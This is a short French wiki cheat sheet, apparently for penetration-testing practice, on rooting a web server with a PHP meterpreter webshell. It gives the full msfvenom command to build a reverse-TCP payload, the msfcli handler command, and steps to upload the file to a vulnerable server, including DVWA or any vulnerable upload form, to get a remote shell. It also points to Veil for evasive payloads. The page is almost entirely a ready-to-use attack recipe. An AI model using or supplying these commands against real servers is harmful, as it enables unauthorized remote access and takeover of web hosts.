ROOT webserver

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche
Fiche express
Domaine Exploitation web (PHP)
Outil msfvenom / msfcli
Payload php/meterpreter_reverse_tcp
Voir aussi Veil · DVWA

Génération d'un webshell PHP meterpreter avec msfvenom, déposé sur un serveur web vulnérable (par exemple via DVWA) pour obtenir une session.

Générer le payload

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.0.10 LPORT=81 -f raw > Desktop/shell.php

Lancer le handler

msfcli exploit/multi/handler LHOST=192.168.0.10 LPORT=81 PAYLOAD=php/meterpreter_reverse_tcp E

Encapsuler le fichier généré entre les balises PHP :

<?php /* contenu généré */ ?>

Déposer le fichier sur le serveur cible (via DVWA ou un upload vulnérable). À l'ouverture du fichier, une session meterpreter s'ouvre :

shell
whoami

Voir aussi

  • Veil — génération de payloads évasifs
  • DVWA — application web volontairement vulnérable